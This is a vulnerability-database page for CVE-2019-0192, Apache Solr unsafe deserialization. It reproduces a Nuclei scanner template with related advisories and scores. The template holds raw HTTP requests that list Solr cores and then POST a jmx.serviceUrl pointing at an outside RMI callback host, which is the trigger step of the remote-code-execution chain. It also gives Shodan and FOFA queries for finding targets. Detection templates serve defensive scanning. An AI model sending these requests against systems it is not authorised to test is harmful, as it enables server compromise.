Apache Solr - Deserialization of Untrusted Data

🗓️ 26 Jun 2026 18:13:08Reported by ProjectDiscoveryType

Apache Solr unsafe deserialization allows remote code execution via malicious RMI serve

Reporter	Title	Published	Views	Family All 33
IBM Security Bulletins	Security Bulletin: Potential vulnerability related to Unsafe Deserialization in Apache Solr shipped with IBM Operations Analytics - Log Analysis (CVE-2019-0192)	23 Apr 201904:50	–	ibm
IBM Security Bulletins	Log Analysis Security Bulletin List	1 Sep 202111:04	–	ibm
IBM Security Bulletins	Security Bulletin: A vulnerability in Apache Solr affects IBM InfoSphere Information Server	27 Jun 201923:45	–	ibm
Tenable Nessus	Apache Solr 5.x <= 5.5.5 or 6.x <= 6.6.5 Deserialization Vulnerability (CVE-2019-0192)	3 Jul 201900:00	–	nessus
Tenable Nessus	Oracle Primavera Unifier Multiple Vulnerabilities (Jul 2019 CPU)	19 Jul 201900:00	–	nessus
Tenable Nessus	Apache Solr 5.x <= 5.5.5 or 6.x <= 6.6.5 Deserialization Vulnerability	27 Mar 201900:00	–	nessus
Tenable Nessus	Linux Distros Unpatched Vulnerability : CVE-2019-0192	27 Aug 202500:00	–	nessus
Tenable Nessus	Apache Solr 5.0.0 < 5.5.5 Remote Code Execution	22 Jan 202000:00	–	nessus
Tenable Nessus	Apache Solr 6.0.0 < 6.6.5 Remote Code Execution	22 Jan 202000:00	–	nessus
BDU FSTEC	The vulnerability of the Config software interface towards the Apache Solr search server allows a hacker to execute arbitrary code.	18 Nov 201900:00	–	bdu_fstec

Source	Link
github	www.github.com/Imanfeng/Apache-Solr-RCE
nvd	www.nvd.nist.gov/vuln/detail/CVE-2019-0192

id: CVE-2019-0192

info:
  name: Apache Solr - Deserialization of Untrusted Data
  author: hnd3884
  severity: critical
  description: |
    In Apache Solr versions 5.0.0 to 5.5.5 and 6.0.0 to 6.6.5, the Config API allows to configure the JMX server via an HTTP POST request. By pointing it to a malicious RMI server, an attacker could take advantage of Solr's unsafe deserialization to trigger remote code execution on the Solr side.
  impact: |
    Unauthenticated attackers can trigger remote code execution via unsafe deserialization by pointing the JMX server to a malicious RMI server, leading to complete Solr server compromise.
  remediation: |
    Upgrade to Apache Solr version 5.5.6, 6.6.6, or later versions that are not vulnerable.
  reference:
    - https://github.com/Imanfeng/Apache-Solr-RCE
    - https://nvd.nist.gov/vuln/detail/CVE-2019-0192
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-0192
    cwe-id: CWE-502
    epss-score: 0.77508
    epss-percentile: 0.99502
    cpe: cpe:2.3:a:apache:solr:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: apache
    product: solr
    shodan-query: title:"Solr"
    fofa-query: title="Solr
  tags: cve,cve2019,apache,solr,deserialization,rce,oast,vkev,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /solr/admin/cores?wt=json HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: json
        name: core_name
        json:
          - '.status | .[].name'
        internal: true

  - raw:
      - |
        POST /solr/{{core_name}}/config HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"set-property":{"jmx.serviceUrl":"service:jmx:rmi:///jndi/rmi://{{interactsh-url}}/obj"}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns")'
          - 'contains(body, "javax.management.remote.rmi")'
          - 'contains(content_type, "text/plain")'
          - 'status_code == 500'
        condition: and
# digest: 490a00463044022070b68dfd4e1f69612467e34517c191585a411a0a01e0426f4b1a5242500ead95022004538a5c5d8de5d2782d9c8d36af7832c673d3c4e753e8897ef28a928c0e8ee4:922c64590222798bb761d5b6d8e72950

04 Feb 2026 07:00Current

8.2High risk

Vulners AI Score8.2

CVSS 27.5

CVSS 39.8

EPSS0.77508